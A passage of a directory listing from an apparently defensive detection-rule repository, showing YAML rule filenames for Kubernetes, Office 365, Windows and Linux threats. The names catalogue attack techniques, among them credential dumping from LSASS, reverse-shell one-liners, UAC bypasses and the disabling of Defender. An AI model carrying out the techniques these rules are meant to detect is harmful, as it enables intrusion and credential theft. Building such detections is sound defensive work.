│   │   ├── gsuite_suspicious_shared_file_name.yml
│   │   ├── high_number_of_login_failures_from_a_single_source.yml
│   │   ├── kubernetes_abuse_of_secret_by_unusual_location.yml
│   │   ├── kubernetes_abuse_of_secret_by_unusual_user_agent.yml
│   │   ├── kubernetes_abuse_of_secret_by_unusual_user_group.yml
│   │   ├── kubernetes_abuse_of_secret_by_unusual_user_name.yml
│   │   ├── kubernetes_access_scanning.yml
│   │   ├── kubernetes_anomalous_inbound_network_activity_from_process.yml
│   │   ├── kubernetes_anomalous_inbound_outbound_network_io.yml
│   │   ├── kubernetes_anomalous_inbound_to_outbound_network_io_ratio.yml
│   │   ├── kubernetes_anomalous_outbound_network_activity_from_process.yml
│   │   ├── kubernetes_anomalous_traffic_on_network_edge.yml
│   │   ├── kubernetes_aws_detect_suspicious_kubectl_calls.yml
│   │   ├── kubernetes_create_or_update_privileged_pod.yml
│   │   ├── kubernetes_cron_job_creation.yml
│   │   ├── kubernetes_daemonset_deployed.yml
│   │   ├── kubernetes_falco_shell_spawned.yml
│   │   ├── kubernetes_newly_seen_tcp_edge.yml
│   │   ├── kubernetes_newly_seen_udp_edge.yml
│   │   ├── kubernetes_nginx_ingress_lfi.yml
│   │   ├── kubernetes_nginx_ingress_rfi.yml
│   │   ├── kubernetes_node_port_creation.yml
│   │   ├── kubernetes_pod_created_in_default_namespace.yml
│   │   ├── kubernetes_pod_with_host_network_attachment.yml
│   │   ├── kubernetes_previously_unseen_container_image_name.yml
│   │   ├── kubernetes_previously_unseen_process.yml
│   │   ├── kubernetes_process_running_from_new_path.yml
│   │   ├── kubernetes_process_with_anomalous_resource_utilisation.yml
│   │   ├── kubernetes_process_with_resource_ratio_anomalies.yml
│   │   ├── kubernetes_scanner_image_pulling.yml
│   │   ├── kubernetes_scanning_by_unauthenticated_ip_address.yml
│   │   ├── kubernetes_shell_running_on_worker_node.yml
│   │   ├── kubernetes_shell_running_on_worker_node_with_cpu_activity.yml
│   │   ├── kubernetes_suspicious_image_pulling.yml
│   │   ├── kubernetes_unauthorized_access.yml
│   │   ├── microsoft_intune_device_health_scripts.yml
│   │   ├── microsoft_intune_devicemanagementconfigurationpolicies.yml
│   │   ├── microsoft_intune_manual_device_management.yml
│   │   ├── microsoft_intune_mobile_apps.yml
│   │   ├── o365_add_app_role_assignment_grant_user.yml
│   │   ├── o365_added_service_principal.yml
│   │   ├── o365_admin_consent_bypassed_by_service_principal.yml
│   │   ├── o365_advanced_audit_disabled.yml
│   │   ├── o365_application_available_to_other_tenants.yml
│   │   ├── o365_application_registration_owner_added.yml
│   │   ├── o365_applicationimpersonation_role_assigned.yml
│   │   ├── o365_bec_email_hiding_rule_created.yml
│   │   ├── o365_block_user_consent_for_risky_apps_disabled.yml
│   │   ├── o365_bypass_mfa_via_trusted_ip.yml
│   │   ├── o365_compliance_content_search_exported.yml
│   │   ├── o365_compliance_content_search_started.yml
│   │   ├── o365_concurrent_sessions_from_different_ips.yml
│   │   ├── o365_cross_tenant_access_change.yml
│   │   ├── o365_disable_mfa.yml
│   │   ├── o365_dlp_rule_triggered.yml
│   │   ├── o365_elevated_mailbox_permission_assigned.yml
│   │   ├── o365_email_access_by_security_administrator.yml
│   │   ├── o365_email_hard_delete_excessive_volume.yml
│   │   ├── o365_email_new_inbox_rule_created.yml
│   │   ├── o365_email_password_and_payroll_compromise_behavior.yml
│   │   ├── o365_email_receive_and_hard_delete_takeover_behavior.yml
│   │   ├── o365_email_reported_by_admin_found_malicious.yml
│   │   ├── o365_email_reported_by_user_found_malicious.yml
│   │   ├── o365_email_security_feature_changed.yml
│   │   ├── o365_email_send_and_hard_delete_exfiltration_behavior.yml
│   │   ├── o365_email_send_and_hard_delete_suspicious_behavior.yml
│   │   ├── o365_email_send_attachments_excessive_volume.yml
│   │   ├── o365_email_suspicious_behavior_alert.yml
│   │   ├── o365_email_suspicious_search_behavior.yml
│   │   ├── o365_email_transport_rule_changed.yml
│   │   ├── o365_excessive_authentication_failures_alert.yml
│   │   ├── o365_excessive_sso_logon_errors.yml
│   │   ├── o365_exfiltration_via_file_access.yml
│   │   ├── o365_exfiltration_via_file_download.yml
│   │   ├── o365_exfiltration_via_file_sync_download.yml
│   │   ├── o365_external_guest_user_invited.yml
│   │   ├── o365_external_identity_policy_changed.yml
│   │   ├── o365_file_permissioned_application_consent_granted_by_user.yml
│   │   ├── o365_fullaccessasapp_permission_assigned.yml
│   │   ├── o365_high_number_of_failed_authentications_for_user.yml
│   │   ├── o365_high_privilege_role_granted.yml
│   │   ├── o365_mail_permissioned_application_consent_granted_by_user.yml
│   │   ├── o365_mailbox_email_forwarding_enabled.yml
│   │   ├── o365_mailbox_folder_read_permission_assigned.yml
│   │   ├── o365_mailbox_folder_read_permission_granted.yml
│   │   ├── o365_mailbox_inbox_folder_shared_with_all_users.yml
│   │   ├── o365_mailbox_read_access_granted_to_application.yml
│   │   ├── o365_multi_source_failed_authentications_spike.yml
│   │   ├── o365_multiple_appids_and_useragents_authentication_spike.yml
│   │   ├── o365_multiple_failed_mfa_requests_for_user.yml
│   │   ├── o365_multiple_mailboxes_accessed_via_api.yml
│   │   ├── o365_multiple_os_vendors_authenticating_from_user.yml
│   │   ├── o365_multiple_service_principals_created_by_sp.yml
│   │   ├── o365_multiple_service_principals_created_by_user.yml
│   │   ├── o365_multiple_users_failing_to_authenticate_from_ip.yml
│   │   ├── o365_new_email_forwarding_rule_created.yml
│   │   ├── o365_new_email_forwarding_rule_enabled.yml
│   │   ├── o365_new_federated_domain_added.yml
│   │   ├── o365_new_forwarding_mailflow_rule_created.yml
│   │   ├── o365_new_mfa_method_registered.yml
│   │   ├── o365_oauth_app_mailbox_access_via_ews.yml
│   │   ├── o365_oauth_app_mailbox_access_via_graph_api.yml
│   │   ├── o365_privileged_graph_api_permission_assigned.yml
│   │   ├── o365_privileged_role_assigned.yml
│   │   ├── o365_privileged_role_assigned_to_service_principal.yml
│   │   ├── o365_pst_export_alert.yml
│   │   ├── o365_safe_links_detection.yml
│   │   ├── o365_security_and_compliance_alert_triggered.yml
│   │   ├── o365_service_principal_new_client_credentials.yml
│   │   ├── o365_service_principal_privilege_escalation.yml
│   │   ├── o365_sharepoint_allowed_domains_policy_changed.yml
│   │   ├── o365_sharepoint_malware_detection.yml
│   │   ├── o365_sharepoint_suspicious_search_behavior.yml
│   │   ├── o365_tenant_wide_admin_consent_granted.yml
│   │   ├── o365_threat_intelligence_suspicious_email_delivered.yml
│   │   ├── o365_threat_intelligence_suspicious_file_detected.yml
│   │   ├── o365_user_consent_blocked_for_risky_application.yml
│   │   ├── o365_user_consent_denied_for_oauth_application.yml
│   │   ├── o365_zap_activity_detection.yml
│   │   └── risk_rule_for_dev_sec_ops_by_repository.yml
│   ├── deprecated
│   │   ├── .gitkeep
│   │   ├── certutil_download_with_urlcache_and_split_arguments.yml
│   │   ├── certutil_download_with_verifyctl_and_split_arguments.yml
│   │   ├── windows_certutil_download_with_url_argument.yml
│   │   └── windows_remote_access_software_hunt.yml
│   ├── endpoint
│   │   ├── 7zip_commandline_to_smb_share_path.yml
│   │   ├── access_lsass_memory_for_dump_creation.yml
│   │   ├── active_directory_lateral_movement_identified.yml
│   │   ├── active_directory_privilege_escalation_identified.yml
│   │   ├── active_setup_registry_autostart.yml
│   │   ├── add_defaultuser_and_password_in_registry.yml
│   │   ├── add_or_set_windows_defender_exclusion.yml
│   │   ├── adsisearcher_account_discovery.yml
│   │   ├── allow_file_and_printing_sharing_in_firewall.yml
│   │   ├── allow_inbound_traffic_by_firewall_rule_registry.yml
│   │   ├── allow_inbound_traffic_in_firewall_rule.yml
│   │   ├── allow_network_discovery_in_firewall.yml
│   │   ├── allow_operation_with_consent_admin.yml
│   │   ├── anomalous_usage_of_7zip.yml
│   │   ├── any_powershell_downloadfile.yml
│   │   ├── any_powershell_downloadstring.yml
│   │   ├── attacker_tools_on_endpoint.yml
│   │   ├── attempt_to_add_certificate_to_untrusted_store.yml
│   │   ├── auto_admin_logon_registry_entry.yml
│   │   ├── batch_file_write_to_system32.yml
│   │   ├── bcdedit_command_back_to_normal_mode_boot.yml
│   │   ├── bcdedit_failure_recovery_modification.yml
│   │   ├── bits_job_persistence.yml
│   │   ├── bitsadmin_download_file.yml
│   │   ├── certutil_exe_certificate_extraction.yml
│   │   ├── certutil_with_decode_argument.yml
│   │   ├── change_to_safe_mode_with_network_config.yml
│   │   ├── chcp_command_execution.yml
│   │   ├── check_elevated_cmd_using_whoami.yml
│   │   ├── child_processes_of_spoolsv_exe.yml
│   │   ├── clear_unallocated_sector_using_cipher_app.yml
│   │   ├── clop_common_exec_parameter.yml
│   │   ├── clop_ransomware_known_service_name.yml
│   │   ├── cmd_carry_out_string_command_parameter.yml
│   │   ├── cmd_echo_pipe___escalation.yml
│   │   ├── cmlua_or_cmstplua_uac_bypass.yml
│   │   ├── cobalt_strike_named_pipes.yml
│   │   ├── common_ransomware_extensions.yml
│   │   ├── common_ransomware_notes.yml
│   │   ├── connectwise_screenconnect_path_traversal.yml
│   │   ├── connectwise_screenconnect_path_traversal_windows_sacl.yml
│   │   ├── conti_common_exec_parameter.yml
│   │   ├── control_loading_from_world_writable_directory.yml
│   │   ├── create_or_delete_windows_shares_using_net_exe.yml
│   │   ├── create_remote_thread_in_shell_application.yml
│   │   ├── create_remote_thread_into_lsass.yml
│   │   ├── creation_of_lsass_dump_with_taskmgr.yml
│   │   ├── creation_of_shadow_copy.yml
│   │   ├── creation_of_shadow_copy_with_wmic_and_powershell.yml
│   │   ├── credential_dumping_via_copy_command_from_shadow_copy.yml
│   │   ├── credential_dumping_via_symlink_to_shadow_copy.yml
│   │   ├── crowdstrike_admin_weak_password_policy.yml
│   │   ├── crowdstrike_admin_with_duplicate_password.yml
│   │   ├── crowdstrike_high_identity_risk_severity.yml
│   │   ├── crowdstrike_medium_identity_risk_severity.yml
│   │   ├── crowdstrike_medium_severity_alert.yml
│   │   ├── crowdstrike_multiple_low_severity_alerts.yml
│   │   ├── crowdstrike_privilege_escalation_for_non_admin_user.yml
│   │   ├── crowdstrike_user_weak_password_policy.yml
│   │   ├── crowdstrike_user_with_duplicate_password.yml
│   │   ├── csc_net_on_the_fly_compilation.yml
│   │   ├── curl_download_and_bash_execution.yml
│   │   ├── delete_shadowcopy_with_powershell.yml
│   │   ├── deleting_shadow_copies.yml
│   │   ├── detect_azurehound_command_line_arguments.yml
│   │   ├── detect_azurehound_file_modifications.yml
│   │   ├── detect_baron_samedit_cve_2021_3156.yml
│   │   ├── detect_baron_samedit_cve_2021_3156_segfault.yml
│   │   ├── detect_baron_samedit_cve_2021_3156_via_osquery.yml
│   │   ├── detect_certify_command_line_arguments.yml
│   │   ├── detect_certify_with_powershell_script_block_logging.yml
│   │   ├── detect_certipy_file_modifications.yml
│   │   ├── detect_computer_changed_with_anonymous_account.yml
│   │   ├── detect_copy_of_shadowcopy_with_script_block_logging.yml
│   │   ├── detect_credential_dumping_through_lsass_access.yml
│   │   ├── detect_empire_with_powershell_script_block_logging.yml
│   │   ├── detect_excessive_account_lockouts_from_endpoint.yml
│   │   ├── detect_excessive_user_account_lockouts.yml
│   │   ├── detect_exchange_web_shell.yml
│   │   ├── detect_html_help_renamed.yml
│   │   ├── detect_html_help_url_in_command_line.yml
│   │   ├── detect_html_help_using_infotech_storage_handlers.yml
│   │   ├── detect_mimikatz_with_powershell_script_block_logging.yml
│   │   ├── detect_mshta_inline_hta_execution.yml
│   │   ├── detect_mshta_renamed.yml
│   │   ├── detect_mshta_url_in_command_line.yml
│   │   ├── detect_new_local_admin_account.yml
│   │   ├── detect_outlook_exe_writing_a_zip_file.yml
├── detect_password_spray_attack_behavior_from_source.yml │ ├── detect_password_spray_attack_behavior_on_user.yml │ ├── detect_path_interception_by_creation_of_program_exe.yml │ ├── detect_prohibited_applications_spawning_cmd_exe.yml │ ├── detect_psexec_with_accepteula_flag.yml │ ├── detect_rare_executables.yml │ ├── detect_rclone_command_line_usage.yml │ ├── detect_regasm_spawning_a_process.yml │ ├── detect_regasm_with_network_connection.yml │ ├── detect_regasm_with_no_command_line_arguments.yml │ ├── detect_regsvcs_spawning_a_process.yml │ ├── detect_regsvcs_with_network_connection.yml │ ├── detect_regsvcs_with_no_command_line_arguments.yml │ ├── detect_regsvr32_application_control_bypass.yml │ ├── detect_remote_access_software_usage_file.yml │ ├── detect_remote_access_software_usage_fileinfo.yml │ ├── detect_remote_access_software_usage_process.yml │ ├── detect_remote_access_software_usage_registry.yml │ ├── detect_renamed_7_zip.yml │ ├── detect_renamed_psexec.yml │ ├── detect_renamed_rclone.yml │ ├── detect_renamed_winrar.yml │ ├── detect_rtlo_in_file_name.yml │ ├── detect_rtlo_in_process.yml │ ├── detect_rundll32_application_control_bypass___advpack.yml │ ├── detect_rundll32_application_control_bypass___setupapi.yml │ ├── detect_rundll32_application_control_bypass___syssetup.yml │ ├── detect_rundll32_inline_hta_execution.yml │ ├── detect_sharphound_command_line_arguments.yml │ ├── detect_sharphound_file_modifications.yml │ ├── detect_sharphound_usage.yml │ ├── detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml │ ├── detect_use_of_cmd_exe_to_launch_script_interpreters.yml │ ├── detect_wmi_event_subscription_persistence.yml │ ├── detection_of_tools_built_by_nirsoft.yml │ ├── disable_amsi_through_registry.yml │ ├── disable_defender_antivirus_registry.yml │ ├── disable_defender_blockatfirstseen_feature.yml │ ├── disable_defender_enhanced_notification.yml │ ├── disable_defender_mpengine_registry.yml │ ├── disable_defender_spynet_reporting.yml │ ├── 
disable_defender_submit_samples_consent_feature.yml │ ├── disable_etw_through_registry.yml │ ├── disable_logs_using_wevtutil.yml │ ├── disable_registry_tool.yml │ ├── disable_schedule_task.yml │ ├── disable_security_logs_using_minint_registry.yml │ ├── disable_show_hidden_files.yml │ ├── disable_uac_remote_restriction.yml │ ├── disable_windows_app_hotkeys.yml │ ├── disable_windows_behavior_monitoring.yml │ ├── disable_windows_smartscreen_protection.yml │ ├── disabled_kerberos_pre_authentication_discovery_with_get_aduser.yml │ ├── disabled_kerberos_pre_authentication_discovery_with_powerview.yml │ ├── disabling_cmd_application.yml │ ├── disabling_controlpanel.yml │ ├── disabling_defender_services.yml │ ├── disabling_firewall_with_netsh.yml │ ├── disabling_folderoptions_windows_feature.yml │ ├── disabling_norun_windows_app.yml │ ├── disabling_remote_user_account_control.yml │ ├── disabling_systemrestore_in_registry.yml │ ├── disabling_task_manager.yml │ ├── disabling_windows_local_security_authority_defences_via_registry.yml │ ├── dllhost_with_no_command_line_arguments_with_network.yml │ ├── dns_exfiltration_using_nslookup_app.yml │ ├── domain_account_discovery_with_dsquery.yml │ ├── domain_account_discovery_with_wmic.yml │ ├── domain_controller_discovery_with_nltest.yml │ ├── domain_controller_discovery_with_wmic.yml │ ├── domain_group_discovery_with_adsisearcher.yml │ ├── domain_group_discovery_with_dsquery.yml │ ├── domain_group_discovery_with_wmic.yml │ ├── download_files_using_telegram.yml │ ├── drop_icedid_license_dat.yml │ ├── dsquery_domain_discovery.yml │ ├── dump_lsass_via_comsvcs_dll.yml │ ├── dump_lsass_via_procdump.yml │ ├── elevated_group_discovery_with_powerview.yml │ ├── elevated_group_discovery_with_wmic.yml │ ├── enable_rdp_in_other_port_number.yml │ ├── enable_wdigest_uselogoncredential_registry.yml │ ├── enumerate_users_local_group_using_telegram.yml │ ├── esentutl_sam_copy.yml │ ├── etw_registry_disabled.yml │ ├── eventvwr_uac_bypass.yml │ ├── 
excessive_attempt_to_disable_services.yml │ ├── excessive_distinct_processes_from_windows_temp.yml │ ├── excessive_file_deletion_in_windefender_folder.yml │ ├── excessive_number_of_service_control_start_as_disabled.yml │ ├── excessive_number_of_taskhost_processes.yml │ ├── excessive_usage_of_cacls_app.yml │ ├── excessive_usage_of_nslookup_app.yml │ ├── excessive_usage_of_sc_service_utility.yml │ ├── excessive_usage_of_taskkill.yml │ ├── exchange_powershell_abuse_via_ssrf.yml │ ├── exchange_powershell_module_usage.yml │ ├── executable_file_written_in_administrative_smb_share.yml │ ├── executables_or_script_creation_in_suspicious_path.yml │ ├── executables_or_script_creation_in_temp_path.yml │ ├── execute_javascript_with_jscript_com_clsid.yml │ ├── execution_of_file_with_multiple_extensions.yml │ ├── file_with_samsam_extension.yml │ ├── firewall_allowed_program_enable.yml │ ├── first_time_seen_child_process_of_zoom.yml │ ├── first_time_seen_running_windows_service.yml │ ├── fodhelper_uac_bypass.yml │ ├── fsutil_zeroing_file.yml │ ├── get_addefaultdomainpasswordpolicy_with_powershell.yml │ ├── get_addefaultdomainpasswordpolicy_with_powershell_script_block.yml │ ├── get_aduser_with_powershell.yml │ ├── get_aduser_with_powershell_script_block.yml │ ├── get_aduserresultantpasswordpolicy_with_powershell.yml │ ├── get_aduserresultantpasswordpolicy_with_powershell_script_block.yml │ ├── get_domainpolicy_with_powershell.yml │ ├── get_domainpolicy_with_powershell_script_block.yml │ ├── get_domaintrust_with_powershell.yml │ ├── get_domaintrust_with_powershell_script_block.yml │ ├── get_domainuser_with_powershell.yml │ ├── get_domainuser_with_powershell_script_block.yml │ ├── get_foresttrust_with_powershell.yml │ ├── get_foresttrust_with_powershell_script_block.yml │ ├── get_wmiobject_group_discovery.yml │ ├── get_wmiobject_group_discovery_with_script_block_logging.yml │ ├── getadcomputer_with_powershell.yml │ ├── getadcomputer_with_powershell_script_block.yml │ ├── 
getadgroup_with_powershell.yml │ ├── getadgroup_with_powershell_script_block.yml │ ├── getcurrent_user_with_powershell.yml │ ├── getcurrent_user_with_powershell_script_block.yml │ ├── getdomaincomputer_with_powershell.yml │ ├── getdomaincomputer_with_powershell_script_block.yml │ ├── getdomaincontroller_with_powershell.yml │ ├── getdomaincontroller_with_powershell_script_block.yml │ ├── getdomaingroup_with_powershell.yml │ ├── getdomaingroup_with_powershell_script_block.yml │ ├── getlocaluser_with_powershell.yml │ ├── getlocaluser_with_powershell_script_block.yml │ ├── getnettcpconnection_with_powershell.yml │ ├── getnettcpconnection_with_powershell_script_block.yml │ ├── getwmiobject_ds_computer_with_powershell.yml │ ├── getwmiobject_ds_computer_with_powershell_script_block.yml │ ├── getwmiobject_ds_group_with_powershell.yml │ ├── getwmiobject_ds_group_with_powershell_script_block.yml │ ├── getwmiobject_ds_user_with_powershell.yml │ ├── getwmiobject_ds_user_with_powershell_script_block.yml │ ├── getwmiobject_user_account_with_powershell.yml │ ├── getwmiobject_user_account_with_powershell_script_block.yml │ ├── gpupdate_with_no_command_line_arguments_with_network.yml │ ├── headless_browser_mockbin_or_mocky_request.yml │ ├── headless_browser_usage.yml │ ├── hide_user_account_from_sign_in_screen.yml │ ├── hiding_files_and_directories_with_attrib_exe.yml │ ├── high_frequency_copy_of_files_in_network_share.yml │ ├── high_process_termination_frequency.yml │ ├── hunting_3cxdesktopapp_software.yml │ ├── icacls_deny_command.yml │ ├── icacls_grant_command.yml │ ├── icedid_exfiltrated_archived_file_creation.yml │ ├── impacket_lateral_movement_commandline_parameters.yml │ ├── impacket_lateral_movement_smbexec_commandline_parameters.yml │ ├── impacket_lateral_movement_wmiexec_commandline_parameters.yml │ ├── interactive_session_on_remote_endpoint_with_powershell.yml │ ├── java_writing_jsp_file.yml │ ├── jscript_execution_using_cscript_app.yml │ ├── 
kerberoasting_spn_request_with_rc4_encryption.yml │ ├── kerberos_pre_authentication_flag_disabled_in_useraccountcontrol.yml │ ├── kerberos_pre_authentication_flag_disabled_with_powershell.yml │ ├── kerberos_service_ticket_request_using_rc4_encryption.yml │ ├── kerberos_tgt_request_using_rc4_encryption.yml │ ├── kerberos_user_enumeration.yml │ ├── linux_account_manipulation_of_ssh_config_and_keys.yml │ ├── linux_add_files_in_known_crontab_directories.yml │ ├── linux_add_user_account.yml │ ├── linux_adding_crontab_using_list_parameter.yml │ ├── linux_apt_get_privilege_escalation.yml │ ├── linux_apt_privilege_escalation.yml │ ├── linux_at_allow_config_file_creation.yml │ ├── linux_at_application_execution.yml │ ├── linux_auditd_add_user_account.yml │ ├── linux_auditd_add_user_account_type.yml │ ├── linux_auditd_at_application_execution.yml │ ├── linux_auditd_auditd_service_stop.yml │ ├── linux_auditd_base64_decode_files.yml │ ├── linux_auditd_change_file_owner_to_root.yml │ ├── linux_auditd_clipboard_data_copy.yml │ ├── linux_auditd_data_destruction_command.yml │ ├── linux_auditd_data_transfer_size_limits_via_split.yml │ ├── linux_auditd_data_transfer_size_limits_via_split_syscall.yml │ ├── linux_auditd_database_file_and_directory_discovery.yml │ ├── linux_auditd_dd_file_overwrite.yml │ ├── linux_auditd_disable_or_modify_system_firewall.yml │ ├── linux_auditd_doas_conf_file_creation.yml │ ├── linux_auditd_doas_tool_execution.yml │ ├── linux_auditd_edit_cron_table_parameter.yml │ ├── linux_auditd_file_and_directory_discovery.yml │ ├── linux_auditd_file_permission_modification_via_chmod.yml │ ├── linux_auditd_file_permissions_modification_via_chattr.yml │ ├── linux_auditd_find_credentials_from_password_managers.yml │ ├── linux_auditd_find_credentials_from_password_stores.yml │ ├── linux_auditd_find_ssh_private_keys.yml │ ├── linux_auditd_hardware_addition_swapoff.yml │ ├── linux_auditd_hidden_files_and_directories_creation.yml │ ├── 
linux_auditd_insert_kernel_module_using_insmod_utility.yml │ ├── linux_auditd_install_kernel_module_using_modprobe_utility.yml │ ├── linux_auditd_kernel_module_enumeration.yml │ ├── linux_auditd_kernel_module_using_rmmod_utility.yml │ ├── linux_auditd_nopasswd_entry_in_sudoers_file.yml │ ├── linux_auditd_osquery_service_stop.yml │ ├── linux_auditd_possible_access_or_modification_of_sshd_config_file.yml │ ├── linux_auditd_possible_access_to_credential_files.yml │ ├── linux_auditd_possible_access_to_sudoers_file.yml │ ├── linux_auditd_possible_append_cronjob_entry_on_existing_cronjob_file.yml │ ├── linux_auditd_preload_hijack_library_calls.yml │ ├── linux_auditd_preload_hijack_via_preload_file.yml │ ├── linux_auditd_private_keys_and_certificate_enumeration.yml │ ├── linux_auditd_service_restarted.yml │ ├── linux_auditd_service_started.yml │ ├── linux_auditd_setuid_using_chmod_utility.yml │ ├── linux_auditd_setuid_using_setcap_utility.yml │ ├── linux_auditd_shred_overwrite_command.yml │ ├── linux_auditd_stop_services.yml │ ├── linux_auditd_sudo_or_su_execution.yml │ ├── linux_auditd_sysmon_service_stop.yml │ ├── linux_auditd_system_network_configuration_discovery.yml │ ├── linux_auditd_unix_shell_configuration_modification.yml │ ├── linux_auditd_unload_module_via_modprobe.yml │ ├── linux_auditd_virtual_disk_file_and_directory_discovery.yml │ ├── linux_auditd_whoami_user_discovery.yml │ ├── linux_awk_privilege_escalation.yml │ ├── linux_busybox_privilege_escalation.yml │ ├── linux_c89_privilege_escalation.yml │ ├── linux_c99_privilege_escalation.yml │ ├── linux_change_file_owner_to_root.yml │ ├── linux_clipboard_data_copy.yml │ ├── linux_common_process_for_elevation_control.yml │ ├── linux_composer_privilege_escalation.yml │ ├── linux_cpulimit_privilege_escalation.yml │ ├── linux_csvtool_privilege_escalation.yml │ ├── linux_curl_upload_file.yml │ ├── linux_data_destruction_command.yml │ ├── linux_dd_file_overwrite.yml │ ├── linux_decode_base64_to_shell.yml │ ├── 
linux_deleting_critical_directory_using_rm_command.yml │ ├── linux_deletion_of_cron_jobs.yml │ ├── linux_deletion_of_init_daemon_script.yml │ ├── linux_deletion_of_services.yml │ ├── linux_deletion_of_ssl_certificate.yml │ ├── linux_disable_services.yml │ ├── linux_doas_conf_file_creation.yml │ ├── linux_doas_tool_execution.yml │ ├── linux_docker_privilege_escalation.yml │ ├── linux_edit_cron_table_parameter.yml │ ├── linux_emacs_privilege_escalation.yml │ ├── linux_file_created_in_kernel_driver_directory.yml │ ├── linux_file_creation_in_init_boot_directory.yml │ ├── linux_file_creation_in_profile_directory.yml │ ├── linux_find_privilege_escalation.yml │ ├── linux_gdb_privilege_escalation.yml │ ├── linux_gem_privilege_escalation.yml │ ├── linux_gnu_awk_privilege_escalation.yml │ ├── linux_hardware_addition_swapoff.yml │ ├── linux_high_frequency_of_file_deletion_in_boot_folder.yml │ ├── linux_high_frequency_of_file_deletion_in_etc_folder.yml │ ├── linux_impair_defenses_process_kill.yml │ ├── linux_indicator_removal_clear_cache.yml │ ├── linux_indicator_removal_service_file_deletion.yml │ ├── linux_ingress_tool_transfer_hunting.yml │ ├── linux_ingress_tool_transfer_with_curl.yml │ ├── linux_insert_kernel_module_using_insmod_utility.yml │ ├── linux_install_kernel_module_using_modprobe_utility.yml │ ├── linux_iptables_firewall_modification.yml │ ├── linux_java_spawning_shell.yml │ ├── linux_kernel_module_enumeration.yml │ ├── linux_kworker_process_in_writable_process_path.yml │ ├── linux_make_privilege_escalation.yml │ ├── linux_mysql_privilege_escalation.yml │ ├── linux_ngrok_reverse_proxy_usage.yml │ ├── linux_node_privilege_escalation.yml │ ├── linux_nopasswd_entry_in_sudoers_file.yml │ ├── linux_obfuscated_files_or_information_base64_decode.yml │ ├── linux_octave_privilege_escalation.yml │ ├── linux_openvpn_privilege_escalation.yml │ ├── linux_persistence_and_privilege_escalation_risk_behavior.yml │ ├── linux_php_privilege_escalation.yml │ ├── 
linux_pkexec_privilege_escalation.yml │ ├── linux_possible_access_or_modification_of_sshd_config_file.yml │ ├── linux_possible_access_to_credential_files.yml │ ├── linux_possible_access_to_sudoers_file.yml │ ├── linux_possible_append_command_to_at_allow_config_file.yml │ ├── linux_possible_append_command_to_profile_config_file.yml │ ├── linux_possible_append_cronjob_entry_on_existing_cronjob_file.yml │ ├── linux_possible_cronjob_modification_with_editor.yml │ ├── linux_possible_ssh_key_file_creation.yml │ ├── linux_preload_hijack_library_calls.yml │ ├── linux_proxy_socks_curl.yml │ ├── linux_puppet_privilege_escalation.yml │ ├── linux_rpm_privilege_escalation.yml │ ├── linux_ruby_privilege_escalation.yml │ ├── linux_service_file_created_in_systemd_directory.yml │ ├── linux_service_restarted.yml │ ├── linux_service_started_or_enabled.yml │ ├── linux_setuid_using_chmod_utility.yml │ ├── linux_setuid_using_setcap_utility.yml │ ├── linux_shred_overwrite_command.yml │ ├── linux_sqlite3_privilege_escalation.yml │ ├── linux_ssh_authorized_keys_modification.yml │ ├── linux_ssh_remote_services_script_execute.yml │ ├── linux_stdout_redirection_to_dev_null_file.yml │ ├── linux_stop_services.yml │ ├── linux_sudo_or_su_execution.yml │ ├── linux_sudoers_tmp_file_creation.yml │ ├── linux_system_network_discovery.yml │ ├── linux_system_reboot_via_system_request_key.yml │ ├── linux_unix_shell_enable_all_sysrq_functions.yml │ ├── linux_visudo_utility_execution.yml │ ├── living_off_the_land_detection.yml │ ├── loading_of_dynwrapx_module.yml │ ├── local_account_discovery_with_wmic.yml │ ├── log4shell_cve_2021_44228_exploitation.yml │ ├── logon_script_event_trigger_execution.yml │ ├── lolbas_with_network_traffic.yml │ ├── macos___re_opened_applications.yml │ ├── macos_amos_stealer___virtual_machine_check_activity.yml │ ├── macos_lolbin.yml │ ├── macos_plutil.yml │ ├── mailsniper_invoke_functions.yml │ ├── malicious_inprocserver32_modification.yml │ ├── 
malicious_powershell_executed_as_a_service.yml │ ├── malicious_powershell_process___encoded_command.yml │ ├── malicious_powershell_process___execution_policy_bypass.yml │ ├── malicious_powershell_process_with_obfuscation_techniques.yml │ ├── microsoft_defender_atp_alerts.yml │ ├── microsoft_defender_incident_alerts.yml │ ├── mimikatz_passtheticket_commandline_parameters.yml │ ├── mmc_lolbas_execution_process_spawn.yml │ ├── modification_of_wallpaper.yml │ ├── modify_acl_permission_to_files_or_folder.yml │ ├── monitor_registry_keys_for_print_monitors.yml │ ├── moveit_certificate_store_access_failure.yml │ ├── moveit_empty_key_fingerprint_authentication_attempt.yml │ ├── ms_exchange_mailbox_replication_service_writing_active_server_pages.yml │ ├── ms_scripting_process_loading_ldap_module.yml │ ├── ms_scripting_process_loading_wmi_module.yml │ ├── msbuild_suspicious_spawned_by_script_process.yml │ ├── mshta_spawning_rundll32_or_regsvr32_process.yml │ ├── msi_module_loaded_by_non_system_binary.yml │ ├── msmpeng_application_dll_side_loading.yml │ ├── net_profiler_uac_bypass.yml │ ├── network_connection_discovery_with_arp.yml │ ├── network_connection_discovery_with_netstat.yml │ ├── network_discovery_using_route_windows_app.yml │ ├── network_share_discovery_via_dir_command.yml │ ├── network_traffic_to_active_directory_web_services_protocol.yml │ ├── nishang_powershelltcponeline.yml │ ├── nltest_domain_trust_discovery.yml │ ├── non_chrome_process_accessing_chrome_default_dir.yml │ ├── non_firefox_process_access_firefox_profile_dir.yml │ ├── notepad_with_no_command_line_arguments.yml │ ├── ntdsutil_export_ntds.yml │ ├── outbound_network_connection_from_java_using_default_ports.yml │ ├── overwriting_accessibility_binaries.yml │ ├── papercut_ng_suspicious_behavior_debug_log.yml │ ├── permission_modification_using_takeown_app.yml │ ├── petitpotam_network_share_access_request.yml │ ├── petitpotam_suspicious_kerberos_tgt_request.yml │ ├── ping_sleep_batch_command.yml │ ├── 
